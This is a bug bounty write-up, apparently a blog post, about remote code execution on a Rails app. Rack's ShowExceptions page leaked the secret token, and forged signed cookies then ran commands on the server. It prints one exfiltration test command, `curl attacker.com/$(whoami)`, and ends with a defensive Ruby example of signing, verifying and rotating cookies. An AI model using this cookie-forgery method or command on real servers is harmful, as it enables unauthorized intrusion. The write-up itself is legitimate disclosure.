RCE due to showexceptions
AI Summary
An RCE vulnerability was discovered via Rack's ShowExceptions middleware being enabled in production, which leaked the Rails secret token used to sign cookies. The attacker used this token to forge authenticated cookies and execute arbitrary commands on the server.
Entities: Rack, Rails, ShowExceptions, action_dispatch.secret_token, secret_token.rb, robertheaton.com
Hey guys,

First of all, some good news: I'm starting to blog my findings again. I have a few posts ready, just waiting for confirmation from the companies to make them public.

Getting Started

So a few days back I started testing a private BB program and found a straightforward RCE on it. I chose to start hunting on the main web app, i.e. https://app.redacted.com. While going through it I found an endpoint which downloads a CSV report via redacted.redacted.com (an in-scope asset). The filename and its content were defined in the request itself.

Something happened

I was fuzzing around with parameters. When I passed %0d to file_name the server threw an exception, and the exception details were displayed because Rack's ShowExceptions was on.

It's more than something

As the Rack page suggests, "Be careful when you use this on public-facing sites as it could reveal information helpful to attackers". This must not be turned on in a production environment.

Rails (up to v4.0.2, NOT SURE) had a secret token in /config/initializers/secret_token.rb. This token is used to verify the integrity of signed cookies (any cookie set by your Rails application is signed using this token). From Rails 4.0.2 this token is kept in the request environment under the key `action_dispatch.secret_token`. The exception page leaks, or rather includes, this too. This token can be used to get RCE (https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/); read the given link to understand how this works.

I quickly used the code from the above link to generate a cookie to execute `curl attacker.com/$(whoami)` and got a request to attacker.com/app. This RCE was applicable to both https://app.redacted.com/ and https://redacted.redacted.com/ because both shared the same Rails app.

That's all folks :)

Share/Retweet is much appreciated. Doubt?
DM me at @rootxharsh

Timeline
16 July : Bug found and reported
16 July : Triaged
18 July : Fixed
20 July : $5000 rewarded
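Added example, not the author's code or Rails' own implementation: a plain-Ruby reimplementation of the legacy signed-cookie format discussed above (base64 payload, `--`, hex HMAC-SHA1 keyed with the secret token) so the trust relationship is visible. It shows that verification checks nothing but knowledge of the token, that rotating the token invalidates every cookie minted with the leaked one, and that a JSON rather than Marshal serializer limits a cookie that verifies to plain data; the token values are constructed placeholders.

```ruby
require 'openssl'
require 'base64'
require 'json'

# Illustrative reimplementation of the legacy Rails signed-cookie layout:
#   base64(serialized value) + "--" + hex(HMAC-SHA1(secret_token, base64 part))
# Same shape as ActiveSupport::MessageVerifier, but not Rails' code. JSON is
# used instead of Marshal so a verified cookie can only decode to plain data.
module LegacyCookie
  def self.digest(secret, data)
    OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), secret, data)
  end

  # Constant-time comparison so the signature check itself leaks nothing.
  def self.secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end

  # What the application does when it sets a signed cookie.
  def self.generate(secret, value)
    data = Base64.strict_encode64(JSON.generate(value))
    "#{data}--#{digest(secret, data)}"
  end

  # What the application does on every request: the ONLY thing checked is that
  # the HMAC was produced with the same secret_token. Returns the decoded
  # value, or nil when the signature or the encoding is bad.
  def self.verify(secret, cookie)
    data, sig = cookie.to_s.split('--', 2)
    return nil if data.nil? || sig.nil?
    return nil unless secure_compare(sig, digest(secret, data))
    JSON.parse(Base64.strict_decode64(data))
  rescue ArgumentError, JSON::ParserError
    nil
  end
end

# Constructed secrets: the one an exception page would have exposed, and the
# replacement generated after the incident.
LEAKED_TOKEN  = 'constructed-leaked-secret-token-0123456789abcdef'.freeze
ROTATED_TOKEN = 'constructed-fresh-secret-token-fedcba9876543210'.freeze

# Consequences of the leak, and of rotating the token afterwards.
def rotation_demo
  cookie = LegacyCookie.generate(LEAKED_TOKEN, { 'user_id' => 7 })
  {
    before_rotation: LegacyCookie.verify(LEAKED_TOKEN, cookie),  # accepted
    after_rotation:  LegacyCookie.verify(ROTATED_TOKEN, cookie), # rejected
    tampered:        LegacyCookie.verify(LEAKED_TOKEN, cookie.sub('--', 'x--'))
  }
end
```

Disabling ShowExceptions stops further disclosure, but every cookie signed with the exposed token stays valid until the token itself is rotated, which is what the `after_rotation` case checks.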